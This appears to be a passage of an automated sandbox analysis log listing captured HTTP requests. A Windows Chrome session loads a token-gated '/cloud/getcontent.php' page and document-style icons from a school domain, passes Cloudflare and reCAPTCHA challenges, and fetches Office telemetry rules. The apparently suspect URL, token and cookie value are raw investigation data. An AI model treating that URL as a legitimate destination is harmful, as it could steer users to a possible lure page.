    Source: global trafficHTTP traffic detected: GET /cloud/getcontent.php?token=03AFcWeA4EWagOyOb5cz5U9chFCgO5LBlMdhvJAm6scs56fGf1Ll8PdsvuTR6TTlnuO4G_9qM1_1MslWnnEIpSPZyunV_kbmTSGq04FWu0BT9PalOB9tgs9us1t5a0tgHmUlcQ78CuYjJUdqGZoLEA4YXt2J27dDwjTsGy7kbbCVcfJqs3N7y91WBelC2KX0-OiBhLRIklPdrhV8nj6Wz8zmjngVxsEbkNgM_tcWt5myWXhZ-7b8vCcJpEyoCg9F6lVtnlvZoONWnA8v7obkIEIGrIjNwLAeBDQRG_41JX7j7isuUg2v8OJ6SSz_2PqGTiweRgm2bX2sEqoSoUldGxvvdhjvXcbguuVNPyMBrtIjuovX_2VxVONE0Z1ii_SKoCJCHuubf0XPPBvHak_XERds4qYuP02FVs5G-gXeywUacJxmepC8h3oAWwiTnCrGd4BJW8ELDwfPA3U_yYL08oPeCdk7UisDk472zU2qHB8j-pGVMFCS8f0gDxSEOzkNEBcdKgu-9-Qkkcau5x74APHuZEJLBBWOMQy-a8QWTyrbvyg8JshayUo6jko-OSuHiPql840UrB1Ck2LtfuUeQs-6-bYucC4WSctF06cuLDRnNBD5IiP2_3-xMd5HvPPICrenhAABgBxQBmeHTP5AXGaTiFI8CaaxBJxE9kjmqOg9j58bv4do87S798UrMXdvrXA6AaokkXt7bSijkH9WwL56xXXCG1EqKtI7gMI9-hJg33-K8zVvaL_VSMXrClLu66js0vhadAxwfeBCj6noDf30DuZyGvepVaEodB1wZY8dRakvKTV7BUaBW-b2HzTAUVO9aYeMZ6cZNPc4KzNktAFb7EAqzfTX1zbbNex9TINLLjwKW0hRYA1FoAjgk9mGRJL6pDJZScuBrmdtlBWo99i8cmE3qu6KbZX8GxEeUiUhwByr9-x0hKMj3QqeCOQffsgzCeK0K7grzdezxDqd7razGnwrTFh-Ddo4SvU5Pyj1gVjL5bkdywA9u-1t0v07kkJUjlMnn_5ixdyQg-kHVF9bh_lhhH7pvU_FPmAfEGK69Twk5s0IrCXnAxoX9L39vVuTjLzxAMjnbsvjrobP3BYx6bFG0SuVz4MTSWCeI33sJjRcn6Jmp2_rTvEGcJ0HV20FDiexzy6j6n3cWyaCyJYhx_ApeNRRmqBw2i5MtDrThYe-IPLTEUckRQvRWuELahuzaNdjnnwuK7UzayTKYf1PFiosxJJ5hytp_BPu-6k7X8aGkuvMCspjgCcc4eDjs780FXNuccBB1mAy_Q3m0mDGg-jr4RNUzXPpA9WDDakRFaUUGlkmFrJG5Vg3OhldlWZ6XzWNwTu0gxqiiN0gBbskrfuI9Mr7bLHtXLVaGwZNOraXNYaXcKW03IbMAeI4Y_rCblHlvZ5nkgDymaLmphdedVWQl_k1SXTNcrlYFNbs1yQGT0ZzAi2Kba99pRDWoJCngIUUhN9M38O1pWMhMHwLV5pOU0WcuGxBwPtK-yFmdGPx6vllhXyYYRjWbaIgguHy8n0p_8T8wMeeHX9lLEyj-1p_969ftdkjm0LSuEPzcOt3GNJKD2Zaue1m8HmFoSqckSJsHu6O8P3hQu7wjZ2LIX58Q4DDTRxRP6YcYHWXB0H_2iOrPyXeuOHm5FPaMgjtcHcRYFg0QJch34YQOqy9uimY57c2x_p_y3NiOYi2b6ARJiyRN6EyVKDm-j2TSRNPagz1Uv_OaGhnixpl8MMi3ljKGSmjZEnBvrFNHOZuev18gXYZVxlb6W_KOXBCx3DlgpYyHbJO7S52Wzk-9eTFDlW2lKSd9SamXhPXCYiFJ3I6k-rZvVxZTIs9NNaGmOOH8bzQspYgwlAdtgiPiEfsvm0UWcESqGz6i7Rtgprze_ToEReGrWRQOWPH_mX_D5AZcKdmeFuyyjNZCks82PO6MsyXNj6ef96qdzcN11fstNDYtYuNCa8M1_bWJ5__8r-WR0t7Ld9PL0I_slAEggB4Ik5qCcoT90zLC9-t4ysMnm20d154axa-wjv9HUecrHe-brg9GgSNWEzPqaVPhKdHgt8aolr06f0t-eUrbPjW3M6TUArCKnf-WWCpj6Mx29O4tBipwE52V0RtUQv5MK4rxc0aitCUIUhkhHU6EmlslqfUCbK1nCbQCqPVaJ3OuieHpxfivSnherXs3idQwebs8z_G_PvoK6qCR5SbopOwYibf1aAmlDznCtBAdUa4H9B4F45kVFioV9q-6bfb05iVgNa2Dl0tWv_p5M_g5BgYYxSeHV0XUlo_yX9Ce8l3AYDQijPfwek4OTj5CmP-LE_EBX9y_wJM_i1g1xx3g64yDvLubm0HDtJtbf2fOOpUpewJ5leCDhZquiwkLuKOH4LEG387VQt_ZRHA9ulVBv8xDqMOsEzUP4WSvNwaesr24fQuR0uX1K7Nwjf8pxiU07okqlHnpzrUit1Vr24EFZULoJs_n3SoiPVZM3obtTWTZvs3FjIHnEeTnk_dEp-nXomuk9oBk20dHq1pHiKwN-0sIg-TlP1Vt-FVntAoFIsNF6kvT7nfUucnTp HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AMNxLB_posGEm9dxgeZ2_RkIF9tdHhTyg6o7Oc7Urs0DpmK2AotbgsHcB0zhaH_X7jfLPNnxtceeNe1nlltqLoU
    Source: global trafficHTTP traffic detected: GET /cloud/img/bag.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/mp.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/pdf.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/getcontent.php?token=03AFcWeA4EWagOyOb5cz5U9chFCgO5LBlMdhvJAm6scs56fGf1Ll8PdsvuTR6TTlnuO4G_9qM1_1MslWnnEIpSPZyunV_kbmTSGq04FWu0BT9PalOB9tgs9us1t5a0tgHmUlcQ78CuYjJUdqGZoLEA4YXt2J27dDwjTsGy7kbbCVcfJqs3N7y91WBelC2KX0-OiBhLRIklPdrhV8nj6Wz8zmjngVxsEbkNgM_tcWt5myWXhZ-7b8vCcJpEyoCg9F6lVtnlvZoONWnA8v7obkIEIGrIjNwLAeBDQRG_41JX7j7isuUg2v8OJ6SSz_2PqGTiweRgm2bX2sEqoSoUldGxvvdhjvXcbguuVNPyMBrtIjuovX_2VxVONE0Z1ii_SKoCJCHuubf0XPPBvHak_XERds4qYuP02FVs5G-gXeywUacJxmepC8h3oAWwiTnCrGd4BJW8ELDwfPA3U_yYL08oPeCdk7UisDk472zU2qHB8j-pGVMFCS8f0gDxSEOzkNEBcdKgu-9-Qkkcau5x74APHuZEJLBBWOMQy-a8QWTyrbvyg8JshayUo6jko-OSuHiPql840UrB1Ck2LtfuUeQs-6-bYucC4WSctF06cuLDRnNBD5IiP2_3-xMd5HvPPICrenhAABgBxQBmeHTP5AXGaTiFI8CaaxBJxE9kjmqOg9j58bv4do87S798UrMXdvrXA6AaokkXt7bSijkH9WwL56xXXCG1EqKtI7gMI9-hJg33-K8zVvaL_VSMXrClLu66js0vhadAxwfeBCj6noDf30DuZyGvepVaEodB1wZY8dRakvKTV7BUaBW-b2HzTAUVO9aYeMZ6cZNPc4KzNktAFb7EAqzfTX1zbbNex9TINLLjwKW0hRYA1FoAjgk9mGRJL6pDJZScuBrmdtlBWo99i8cmE3qu6KbZX8GxEeUiUhwByr9-x0hKMj3QqeCOQffsgzCeK0K7grzdezxDqd7razGnwrTFh-Ddo4SvU5Pyj1gVjL5bkdywA9u-1t0v07kkJUjlMnn_5ixdyQg-kHVF9bh_lhhH7pvU_FPmAfEGK69Twk5s0IrCXnAxoX9L39vVuTjLzxAMjnbsvjrobP3BYx6bFG0SuVz4MTSWCeI33sJjRcn6Jmp2_rTvEGcJ0HV20FDiexzy6j6n3cWyaCyJYhx_ApeNRRmqBw2i5MtDrThYe-IPLTEUckRQvRWuELahuzaNdjnnwuK7UzayTKYf1PFiosxJJ5hytp_BPu-6k7X8aGkuvMCspjgCcc4eDjs780FXNuccBB1mAy_Q3m0mDGg-jr4RNUzXPpA9WDDakRFaUUGlkmFrJG5Vg3OhldlWZ6XzWNwTu0gxqiiN0gBbskrfuI9Mr7bLHtXLVaGwZNOraXNYaXcKW03IbMAeI4Y_rCblHlvZ5nkgDymaLmphdedVWQl_k1SXTNcrlYFNbs1yQGT0ZzAi2Kba99pRDWoJCngIUUhN9M38O1pWMhMHwLV5pOU0WcuGxBwPtK-yFmdGPx6vllhXyYYRjWbaIgguHy8n0p_8T8wMeeHX9lLEyj-1p_969ftdkjm0LSuEPzcOt3GNJKD2Zaue1m8HmFoSqckSJsHu6O8P3hQu7wjZ2LIX58Q4DDTRxRP6YcYHWXB0H_2iOrPyXeuOHm5FPaMgjtcHcRYFg0QJch34YQOqy9uimY57c2x_p_y3NiOYi2b6ARJiyRN6EyVKDm-j2TSRNPagz1Uv_OaGhnixpl8MMi3ljKGSmjZEnBvrFNHOZuev18gXYZVxlb6W_KOXBCx3DlgpYyHbJO7S52Wzk-9eTFDlW2lKSd9SamXhPXCYiFJ3I6k-rZvVxZTIs9NNaGmOOH8bzQspYgwlAdtgiPiEfsvm0UWcESqGz6i7Rtgprze_ToEReGrWRQOWPH_mX_D5AZcKdmeFuyyjNZCks82PO6MsyXNj6ef96qdzcN11fstNDYtYuNCa8M1_bWJ5__8r-WR0t7Ld9PL0I_slAEggB4Ik5qCcoT90zLC9-t4ysMnm20d154axa-wjv9HUecrHe-brg9GgSNWEzPqaVPhKdHgt8aolr06f0t-eUrbPjW3M6TUArCKnf-WWCpj6Mx29O4tBipwE52V0RtUQv5MK4rxc0aitCUIUhkhHU6EmlslqfUCbK1nCbQCqPVaJ3OuieHpxfivSnherXs3idQwebs8z_G_PvoK6qCR5SbopOwYibf1aAmlDznCtBAdUa4H9B4F45kVFioV9q-6bfb05iVgNa2Dl0tWv_p5M_g5BgYYxSeHV0XUlo_yX9Ce8l3AYDQijPfwek4OTj5CmP-LE_EBX9y_wJM_i1g1xx3g64yDvLubm0HDtJtbf2fOOpUpewJ5leCDhZquiwkLuKOH4LEG387VQt_ZRHA9ulVBv8xDqMOsEzUP4WSvNwaesr24fQuR0uX1K7Nwjf8pxiU07okqlHnpzrUit1Vr24EFZULoJs_n3SoiPVZM3obtTWTZvs3FjIHnEeTnk_dEp-nXomuk9oBk20dHq1pHiKwN-0sIg-TlP1Vt-FVntAoFIsNF6kvT7nfUucnTp HTTP/1.1Host: colegiojuancalvino.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=93684fb0dbd897fd&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/pdf.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/mp.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/bag.png HTTP/1.1Host: colegiojuancalvino.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1763597922:1745691859:D1akmVg8CdFjyxqpVeXkJ8TpD4SsVkweaTwS2aTk9H8/93684fb0dbd897fd/9YvU04gQHGk8xVeVn96jjtZgGMlYAR5Sj8lOuIoKBJ4-1745693903-1.1.1.1-.VSh_U2EX6i2OnA2GC72oLuJZvgRjK51ta99XI2_MVrHeyRiMyhdJn2w9NEBEBb7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/93684fb0dbd897fd/1745693905056/f09a011a7bbe498bc2ab4edbb553506fdcc358ef76a8ec6b1cd7b3acfd36f87f/A6cmbhPyJdX0Ot2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/93684fb0dbd897fd/1745693905058/ARGetAMMqQ9QBdw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/93684fb0dbd897fd/1745693905058/ARGetAMMqQ9QBdw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1763597922:1745691859:D1akmVg8CdFjyxqpVeXkJ8TpD4SsVkweaTwS2aTk9H8/93684fb0dbd897fd/9YvU04gQHGk8xVeVn96jjtZgGMlYAR5Sj8lOuIoKBJ4-1745693903-1.1.1.1-.VSh_U2EX6i2OnA2GC72oLuJZvgRjK51ta99XI2_MVrHeyRiMyhdJn2w9NEBEBb7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1763597922:1745691859:D1akmVg8CdFjyxqpVeXkJ8TpD4SsVkweaTwS2aTk9H8/93684fb0dbd897fd/9YvU04gQHGk8xVeVn96jjtZgGMlYAR5Sj8lOuIoKBJ4-1745693903-1.1.1.1-.VSh_U2EX6i2OnA2GC72oLuJZvgRjK51ta99XI2_MVrHeyRiMyhdJn2w9NEBEBb7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
